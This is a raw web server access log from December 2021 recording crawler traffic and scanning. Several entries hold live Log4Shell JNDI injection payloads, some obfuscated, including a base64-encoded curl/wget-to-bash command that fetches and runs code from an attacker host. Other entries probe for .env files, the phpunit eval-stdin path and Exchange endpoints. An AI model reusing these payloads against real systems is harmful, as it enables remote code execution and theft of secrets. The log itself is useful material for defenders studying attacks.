195.54.160.149 - - [23/Dec/2021:01:05:06 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 301 435 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}"
54.73.242.228 - - [23/Dec/2021:02:28:51 +0100] "GET / HTTP/1.1" 301 391 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
198.20.87.98 - - [23/Dec/2021:02:58:53 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
198.20.87.98 - - [23/Dec/2021:02:59:24 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:02:59:25 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:02:59:26 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:02:59:29 +0100] "quit" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:02:59:31 +0100] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-"
198.20.87.98 - - [23/Dec/2021:02:59:38 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
198.20.87.98 - - [23/Dec/2021:02:59:48 +0100] "" 400 379 "-" "-"
130.211.54.158 - - [23/Dec/2021:04:16:07 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0"
54.246.51.5 - - [23/Dec/2021:04:22:18 +0100] "GET / HTTP/1.1" 301 377 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
163.172.180.25 - - [23/Dec/2021:04:34:10 +0100] "GET / HTTP/1.1" 301 385 "-" "-"
131.220.6.152 - - [23/Dec/2021:04:49:07 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"
85.159.213.60 - - [23/Dec/2021:05:06:41 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
185.220.101.146 - - [23/Dec/2021:06:49:37 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
128.14.134.134 - - [23/Dec/2021:06:56:32 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
192.241.204.61 - - [23/Dec/2021:07:13:05 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x"
192.241.204.61 - - [23/Dec/2021:09:11:27 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x"
192.241.213.23 - - [23/Dec/2021:09:22:00 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x"
40.77.167.42 - - [23/Dec/2021:10:30:44 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
163.172.180.25 - - [23/Dec/2021:11:05:13 +0100] "GET / HTTP/1.1" 301 389 "-" "-"
51.15.195.246 - - [23/Dec/2021:11:05:37 +0100] "GET / HTTP/1.1" 301 400 "-" "-"
195.54.160.149 - - [23/Dec/2021:11:46:56 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.184.152.140 - - [23/Dec/2021:12:11:18 +0100] "GET /${jndi:ldap://90.84.178.188:1389/Exploit} HTTP/1.1" 301 428 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
185.184.152.140 - - [23/Dec/2021:12:11:19 +0100] "GET / HTTP/1.1" 301 383 "-" "${jndi:ldap://90.84.178.188:1389/Exploit}"
185.184.152.140 - - [23/Dec/2021:12:11:20 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0"
185.184.152.140 - - [23/Dec/2021:12:11:21 +0100] "GET /?s=${jndi:ldap://90.84.178.188:1389/Exploit} HTTP/1.1" 301 431 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
164.68.103.201 - - [23/Dec/2021:12:24:46 +0100] "POST / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
164.68.103.201 - - [23/Dec/2021:12:24:47 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
23.251.102.82 - - [23/Dec/2021:13:52:37 +0100] "GET /solr/ HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.71.237.219 - - [23/Dec/2021:13:59:47 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
192.241.215.35 - - [23/Dec/2021:14:29:30 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x"
195.54.160.149 - - [23/Dec/2021:15:15:47 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.72.48.130 - - [23/Dec/2021:15:33:12 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
128.14.133.58 - - [23/Dec/2021:15:46:49 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.133.58 - - [23/Dec/2021:15:47:02 +0100] "HEAD /icons/sphere1.png HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.54.160.149 - - [23/Dec/2021:16:51:13 +0100] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.248.133.43 - - [23/Dec/2021:17:40:59 +0100] "GET / HTTP/1.1" 301 383 "-" "-"
167.248.133.43 - - [23/Dec/2021:17:40:59 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
195.54.160.149 - - [23/Dec/2021:18:24:45 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.212.10 - - [23/Dec/2021:19:08:52 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x"
192.241.211.160 - - [23/Dec/2021:19:09:53 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x"
192.241.200.235 - - [23/Dec/2021:19:11:44 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x"
51.158.118.231 - - [23/Dec/2021:19:29:20 +0100] "GET / HTTP/1.1" 301 392 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:38:27 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
198.20.87.98 - - [23/Dec/2021:19:39:09 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:39:10 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:39:11 +0100] "" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:39:14 +0100] "quit" 400 379 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:39:16 +0100] "GET /sitemap.xml HTTP/1.1" 301 394 "-" "-"
198.20.87.98 - - [23/Dec/2021:19:39:16 +0100] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-"
40.77.167.42 - - [23/Dec/2021:20:33:42 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
128.14.141.34 - - [23/Dec/2021:20:51:05 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.54.160.149 - - [23/Dec/2021:20:57:12 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.149 - - [23/Dec/2021:21:53:02 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 301 435 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}"
45.155.126.3 - - [23/Dec/2021:21:56:11 +0100] "-" 408 - "-" "-"
128.14.209.226 - - [23/Dec/2021:23:00:11 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
3.249.60.79 - - [23/Dec/2021:23:27:26 +0100] "GET / HTTP/1.1" 301 394 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
66.240.236.116 - - [23/Dec/2021:23:55:33 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x"
109.237.103.123 - - [24/Dec/2021:00:27:13 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [24/Dec/2021:00:27:14 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.221.192.26 - - [24/Dec/2021:00:49:29 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"